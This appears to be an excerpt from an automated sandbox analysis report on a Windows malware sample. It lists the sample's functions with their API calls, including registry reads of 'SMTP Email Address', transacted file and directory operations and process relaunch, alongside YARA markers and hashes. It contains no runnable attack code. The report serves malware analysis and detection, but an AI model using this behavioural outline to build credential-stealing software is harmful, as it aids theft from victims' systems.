                                                                                                                                                      • Part of subcall function 004157B4: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 004157F0
                                                                                                                                                      • Part of subcall function 004157B4: CommitTransaction.KTMW32(00000000,?,00417DF5,?,?,00000000,?,?,?,00477F84,?,?,?,?,?,?), ref: 004157FB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Transaction$CreateH_prolog$CommitDeallocateTransacted$CopyDirectoryFile_strcat
                                                                                                                                                    • String ID: 2ES^$8=($:3"%$Cm'"7$DM\[$koha
                                                                                                                                                    • API String ID: 766783516-3495193980
                                                                                                                                                    • Opcode ID: a67dec9554e9f9b92ddef4ca1f12e940dd814689fc0331f85966c74642086b30
                                                                                                                                                    • Instruction ID: 080ebb98571b81949a1c8712e5636bac222786800633bdf7728ac18463086afc
                                                                                                                                                    • Opcode Fuzzy Hash: a67dec9554e9f9b92ddef4ca1f12e940dd814689fc0331f85966c74642086b30
                                                                                                                                                    • Instruction Fuzzy Hash: C6C1BD30D0525CDBDF14EFA5C891AEDBB71AF55304F1041AEE44A7B282EB381A89CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043DBFD, Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesExW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043DC9F
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043DCA9
                                                                                                                                                    • ___std_fs_open_handle@16.LIBCPMT ref: 0043DD09
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesErrorFileLast___std_fs_open_handle@16
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 617199260-0
                                                                                                                                                    • Opcode ID: 091508da9490dd8f9be9d1be91a62edb80f3699627f0d9728afadaf4fb1a60a0
                                                                                                                                                    • Instruction ID: c293362bb4193e41eb285490c66fbbe138575a424f9fdf823129d8fb8e3056c8
                                                                                                                                                    • Opcode Fuzzy Hash: 091508da9490dd8f9be9d1be91a62edb80f3699627f0d9728afadaf4fb1a60a0
                                                                                                                                                    • Instruction Fuzzy Hash: 1B619070E007059FDB18CF68E845BAAB7B4BF09310F14561AEC21EB385E778E911CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00433837, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,00433EC3,00000000,00020019,00433EC3,?,?,00433D99,00000001,?,?,?,00433EC3), ref: 0043385C
                                                                                                                                                    • lstrlenW.KERNEL32(00433EC3,?,?,00433D99,00000001,?,?,?,00433EC3), ref: 00433882
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 0043389F
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,0047B534), ref: 004338AB
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 004338B9
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00433EC3,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00433D99,00000001), ref: 004338ED
                                                                                                                                                    • RegCloseKey.ADVAPI32(00433EC3,?,?,00433D99,00000001,?,?,?,00433EC3), ref: 004338FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2943937744-0
                                                                                                                                                    • Opcode ID: 7aa6290e07912839ca8aeb0854a567f0f9368e0e8b962a0e526b68e9af24544e
                                                                                                                                                    • Instruction ID: e02bdd5ea0313e9784cd151af9cce9c0d6a224811fc50491cc70b1eb49e2b160
                                                                                                                                                    • Opcode Fuzzy Hash: 7aa6290e07912839ca8aeb0854a567f0f9368e0e8b962a0e526b68e9af24544e
                                                                                                                                                    • Instruction Fuzzy Hash: 59213E76501218BFEB119B91DD48EEF7B7CEF09395F004066F909D1110E7745F80DAA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418F1D, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 288stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00418F22
                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00418F61
                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?), ref: 00418F7B
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 00419144
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$CombineFolderH_prologSpeciallstrlen
                                                                                                                                                    • String ID: 0sU
                                                                                                                                                    • API String ID: 1700979297-3292115916
                                                                                                                                                    • Opcode ID: 17d3265bde4aeffea934574a9849a602de58d35905b9175ac193376a18cd62d6
                                                                                                                                                    • Instruction ID: 2dfdba339a5f54811b6d979a5ac51e3a34dc532fb8b4e3805e72e2a484b49285
                                                                                                                                                    • Opcode Fuzzy Hash: 17d3265bde4aeffea934574a9849a602de58d35905b9175ac193376a18cd62d6
                                                                                                                                                    • Instruction Fuzzy Hash: 78C14871D00219DFDF14DFA5C895AEEBBB5BF48304F1041AEE006A7291DB385A89CF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043757F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00437584
                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,755524D0,00000000,0000007B), ref: 00437608
                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 00437657
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00437678
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseH_prologOpenQueryValue
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 1233982722-2766056989
                                                                                                                                                    • Opcode ID: f569bedf93b7987a565192ca90e2c542ba34bc8ffdb68f7dee79d0a2c6e26c93
                                                                                                                                                    • Instruction ID: cca15b945c4463d119694f4bf8feb79ad87de7f277aa4df0e80659841f230d9f
                                                                                                                                                    • Opcode Fuzzy Hash: f569bedf93b7987a565192ca90e2c542ba34bc8ffdb68f7dee79d0a2c6e26c93
                                                                                                                                                    • Instruction Fuzzy Hash: 70518DB0D0425C9FDB21CFA9C890ADEBFB8FF19304F10416EE489A7202DB744A89CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043434E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,00433EC3,00000000,00000100,00000100,?,SMTP Email Address,0047B1F0), ref: 00434396
                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004343B5
                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004343F0
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000100), ref: 00434411
                                                                                                                                                      • Part of subcall function 004443B8: _free.LIBCMT ref: 004443CB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$CloseOpen_free
                                                                                                                                                    • String ID: SMTP Email Address
                                                                                                                                                    • API String ID: 3744367872-3214364705
                                                                                                                                                    • Opcode ID: c0d52560529878ae01d9ecc9645541a12e2db18ca80b7b9591f8b2ce26e4696b
                                                                                                                                                    • Instruction ID: 7e1736f162140044e2e6d77280521f49b5d7150f5ebc081b2a5f9fd436f26a27
                                                                                                                                                    • Opcode Fuzzy Hash: c0d52560529878ae01d9ecc9645541a12e2db18ca80b7b9591f8b2ce26e4696b
                                                                                                                                                    • Instruction Fuzzy Hash: 32319371600219ABEF20CF50DC84BEFBB68EF98754F208026FC04E6251D338ED618B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CD55, Relevance: 7.8, APIs: 5, Instructions: 295memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040CD5A
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CE6D
                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CE74
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 0040D038
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040D03F
                                                                                                                                                      • Part of subcall function 0040C112: __EH_prolog.LIBCMT ref: 0040C117
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$FreeH_prologProcess$Deallocate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4229974167-0
                                                                                                                                                    • Opcode ID: 3de5a54b42f84672cc936181c9737e4ec972cf5006184f47afb8fb62c1c67106
                                                                                                                                                    • Instruction ID: d2bb741ec20b3f3a41fdfcbd6e791d2fee5324d25f6f36c3ad4f9136ec473ed4
                                                                                                                                                    • Opcode Fuzzy Hash: 3de5a54b42f84672cc936181c9737e4ec972cf5006184f47afb8fb62c1c67106
                                                                                                                                                    • Instruction Fuzzy Hash: 6BC13A30C00248DBCF14EFE5C995AEDBBB5AF58304F60816EE815B7291DB386B49CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041D899, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0041D8AD
                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041D8BB
                                                                                                                                                    • _strcat.LIBCMT ref: 0041D921
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0041D93E
                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041D952
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesCreateDirectoryFile$_strcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2481838186-0
                                                                                                                                                    • Opcode ID: 48f9a2da2b3df09fbc4461e67a5bec698e1f16c026ec5bfd7364b503ebd1ba32
                                                                                                                                                    • Instruction ID: fa35a3905336889a20f539d7a4b198cc29d7393b9d98ea7926d2cbc9f41bfd71
                                                                                                                                                    • Opcode Fuzzy Hash: 48f9a2da2b3df09fbc4461e67a5bec698e1f16c026ec5bfd7364b503ebd1ba32
                                                                                                                                                    • Instruction Fuzzy Hash: D91129F2D0031457CF206A686C88BDB776C8B56324F1402A7F5A4D7292EBB84DC9876D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D175, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 291memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040D17A
                                                                                                                                                      • Part of subcall function 0040C112: __EH_prolog.LIBCMT ref: 0040C117
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?), ref: 0040D2A3
                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040D2AA
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeallocateH_prologHeap$FreeProcess
                                                                                                                                                    • String ID: W^J
                                                                                                                                                    • API String ID: 2705843071-612579699
                                                                                                                                                    • Opcode ID: fa84d9c28e7807ee433d5777919e912698fadce454a686cfab51631ba04f60cf
                                                                                                                                                    • Instruction ID: 0b9bd18266f7ce310eb82d8c5a0b9ec378497fe5c9329ff0ec30f1b543aa69b8
                                                                                                                                                    • Opcode Fuzzy Hash: fa84d9c28e7807ee433d5777919e912698fadce454a686cfab51631ba04f60cf
                                                                                                                                                    • Instruction Fuzzy Hash: 08C16F71D01258DBCF14EFA5C891AEDBBB4BF54304F10416EE406B7282EB385B89CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A658, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040A65D
                                                                                                                                                      • Part of subcall function 0043DEE6: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043DEFC
                                                                                                                                                    • LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 0040A6A3
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040A6BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLocal$FormatH_prologMessage
                                                                                                                                                    • String ID: unknown error
                                                                                                                                                    • API String ID: 252809769-3078798498
                                                                                                                                                    • Opcode ID: 1cb1d506ae2c201dcfd1383965648f16abddde4642f0eb71fa60fead628671c1
                                                                                                                                                    • Instruction ID: 3f15feeb580d27a615320d7bbeb71398e2ca7aeaaa569086f82843e51e6124ff
                                                                                                                                                    • Opcode Fuzzy Hash: 1cb1d506ae2c201dcfd1383965648f16abddde4642f0eb71fa60fead628671c1
                                                                                                                                                    • Instruction Fuzzy Hash: D0017CB0A00206EFDB10EF95C982AEEBBB5FF18344F10482FB445A7241D7799E108BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043D89C, Relevance: 6.1, APIs: 4, Instructions: 114fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0043D6D4: CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043D9BE,?,0040C8BF,00000000,?,?,?,?,0040C8BF,?), ref: 0043D6E4
                                                                                                                                                    • CreateFileW.KERNEL32(?,00000081,00000000,00000000,00000003,00000000,00000000,?,0040C8BF,00000001,?,?,?,?,0040C8BF,?), ref: 0043D8E4
                                                                                                                                                    • GetLastError.KERNEL32(?,?,0040C8BF,?,?,?,?,?,?,00000000,?), ref: 0043D8F1
                                                                                                                                                      • Part of subcall function 0043D709: CloseHandle.KERNEL32(000000FF,?,0043DDD1,?,?,?,00000080,?), ref: 0043D715
                                                                                                                                                    • CreateFileW.KERNEL32(0040C8BF,00000082,00000000,00000000,00000003,00000000,00000000,?,?,0040C8BF,?,?), ref: 0043D922
                                                                                                                                                    • GetLastError.KERNEL32(?,?,0040C8BF,?,?,?,?,?,?,00000000,?), ref: 0043D92F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateErrorLast$CloseCopyHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1748377786-0
                                                                                                                                                    • Opcode ID: 9e573d66791210e12b1a8cba856b08511366bf2ec03ae25e39ef295ccb0368e8
                                                                                                                                                    • Instruction ID: 5bd18849382561f5158db9eb8983fb98d1c2e90b0a256a0d913058502d092c46
                                                                                                                                                    • Opcode Fuzzy Hash: 9e573d66791210e12b1a8cba856b08511366bf2ec03ae25e39ef295ccb0368e8
                                                                                                                                                    • Instruction Fuzzy Hash: CA31A4B1E00115BFDB11AAB5AC81ABF77BCEF0D710F141526FD20D6241E7788E019769
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00437B11, Relevance: 6.1, APIs: 4, Instructions: 71processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00437B46
                                                                                                                                                    • CreateProcessA.KERNEL32 ref: 00437BD1
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00437BDA
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00437BE3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$CreateFileModuleNameProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2820832629-0
                                                                                                                                                    • Opcode ID: 93894b1e28c49e2be9e0645cf5bdf3e318282480067706247f61760d5c8f5979
                                                                                                                                                    • Instruction ID: a7cc71f1f1200cb1164200eca56a6f590039630a075aef1c776f79a2b1ef7da1
                                                                                                                                                    • Opcode Fuzzy Hash: 93894b1e28c49e2be9e0645cf5bdf3e318282480067706247f61760d5c8f5979
                                                                                                                                                    • Instruction Fuzzy Hash: AD2192B2D0024CBBEB019BA8DC85EEFB77DEF58304F005166F649A1021F7706A89CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CA14, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,0041763F,00000000,?), ref: 0040CA28
                                                                                                                                                    • CreateDirectoryTransactedA.KERNEL32 ref: 0040CA41
                                                                                                                                                    • CommitTransaction.KTMW32(00000000,?,0041763F,00000000,?), ref: 0040CA4C
                                                                                                                                                    • RollbackTransaction.KTMW32(00000000,?,0041763F,00000000,?), ref: 0040CA54
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Transaction$Create$CommitDirectoryRollbackTransacted
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 629542334-0
                                                                                                                                                    • Opcode ID: 62a468c46453f4edf75caa2172ae3cb2a5adb127464f38f3f801a3bf2eb8e053
                                                                                                                                                    • Instruction ID: abc72f5c4c083c4c4528d9442ed34c3131ea029fe3be8ecebe162cc269fe49a2
                                                                                                                                                    • Opcode Fuzzy Hash: 62a468c46453f4edf75caa2172ae3cb2a5adb127464f38f3f801a3bf2eb8e053
                                                                                                                                                    • Instruction Fuzzy Hash: 7EF09072200119FFE61067A59CC8E67366CDB457B47100736F926E22D0F7B09C818AF6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C9C5, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000010,00000000,?), ref: 0040C9D8
                                                                                                                                                    • DeleteFileTransactedA.KERNEL32 ref: 0040C9EF
                                                                                                                                                    • CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000010,00000000,?,?,?,00417CF0,00000012,?,?), ref: 0040C9FA
                                                                                                                                                    • RollbackTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000010,00000000,?,?,?,00417CF0,00000012,?,?), ref: 0040CA02
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3802493581-0
                                                                                                                                                    • Opcode ID: 7f4a3dc0ac42ac3fe109e11f4dc46a2158a97854d5540f69fb97c291f5d78661
                                                                                                                                                    • Instruction ID: 6cbb28b0e074f628eb329eef80a5b4d2bde5e9c0972e1ffdcd53b953a0fd1836
                                                                                                                                                    • Opcode Fuzzy Hash: 7f4a3dc0ac42ac3fe109e11f4dc46a2158a97854d5540f69fb97c291f5d78661
                                                                                                                                                    • Instruction Fuzzy Hash: DDF05472200114FFE72057559C4DE67366CD7857B07100735FC22E22D0E7B49D818ABA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004297B1, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 004297C4
                                                                                                                                                    • RemoveDirectoryTransactedA.KERNEL32 ref: 004297DB
                                                                                                                                                    • CommitTransaction.KTMW32(00000000,?,00000000), ref: 004297E6
                                                                                                                                                    • RollbackTransaction.KTMW32(00000000,?,00000000), ref: 004297EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1201024725-0
                                                                                                                                                    • Opcode ID: b2ce8792f567ed28990e203d7746523b173f1b6620bc5fef399d8b6a321be257
                                                                                                                                                    • Instruction ID: 90a4787fb370fd0c5c04834e1f7ff0f0f62993064a93b09f514975fdb19dc137
                                                                                                                                                    • Opcode Fuzzy Hash: b2ce8792f567ed28990e203d7746523b173f1b6620bc5fef399d8b6a321be257
                                                                                                                                                    • Instruction Fuzzy Hash: 3CF05471320120FFEB205F69AC48D67366CDB85770B540626F926D22D0E7A49D8186BA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004345CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020008,?), ref: 004345E7
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004345EE
                                                                                                                                                    • GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 00434600
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000200), ref: 0043460D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1246687928-0
                                                                                                                                                    • Opcode ID: ea7a7058bde54f34251d1ccf1a8278741ce93b654c59638177d7d1759b9b3ff3
                                                                                                                                                    • Instruction ID: f193224036ed2ef058cc139246fe1929b6fbecdf5affb936137c38cb5b45e864
                                                                                                                                                    • Opcode Fuzzy Hash: ea7a7058bde54f34251d1ccf1a8278741ce93b654c59638177d7d1759b9b3ff3
                                                                                                                                                    • Instruction Fuzzy Hash: 3AF01C71610204BBEB109FA1DC4ADEB7AACEB46241F100465E812E1110E7B9EE8096A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00456879, Relevance: 4.7, APIs: 3, Instructions: 170fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0045600C: GetConsoleOutputCP.KERNEL32(?,00444EE1,900C408B), ref: 00456054
                                                                                                                                                    • WriteFile.KERNEL32(08458B01,?,00000000,004439FE,00000000,0043E67F,00444EE1,00444EE1,00000010,004439FE,00000000,8304488B,0043E67F,0043E67F,?), ref: 004569BF
                                                                                                                                                    • GetLastError.KERNEL32(?,00444EE1), ref: 004569C9
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00456A08
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 910155933-0
                                                                                                                                                    • Opcode ID: 0b9f4d07854795882474a956b0e929eda371697cb1360ca524e38fc714b9490c
                                                                                                                                                    • Instruction ID: 8758831e845e618b943f5c2dc322f737b5cf14cb6f05ebbfd676c4949aa23216
                                                                                                                                                    • Opcode Fuzzy Hash: 0b9f4d07854795882474a956b0e929eda371697cb1360ca524e38fc714b9490c
                                                                                                                                                    • Instruction Fuzzy Hash: 4751C4B1D00149ABEF119BA5C805BEE7BB8AF4531AF56005BEC00B7253D738D949C769
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00431B80, Relevance: 4.6, APIs: 3, Instructions: 131COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00431B85
                                                                                                                                                    • _Deallocate.LIBCONCRT ref: 00431C78
                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00431CCD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::cancel_current_taskDeallocateH_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2506673365-0
                                                                                                                                                    • Opcode ID: c07b1a94bc75ad1dc23f8559f4dba5a00e685dbe1d67637a029d87153297df1c
                                                                                                                                                    • Instruction ID: 54ccc080694430cf62c6e6c224fa9b5c12e5b048137ded5fac3589ce96495e2c
                                                                                                                                                    • Opcode Fuzzy Hash: c07b1a94bc75ad1dc23f8559f4dba5a00e685dbe1d67637a029d87153297df1c
                                                                                                                                                    • Instruction Fuzzy Hash: 3D418372A042058FCB18DF69D5919AEBBF6EB8C350F24942FE049D7350DB78E941CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00434048, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0043404D
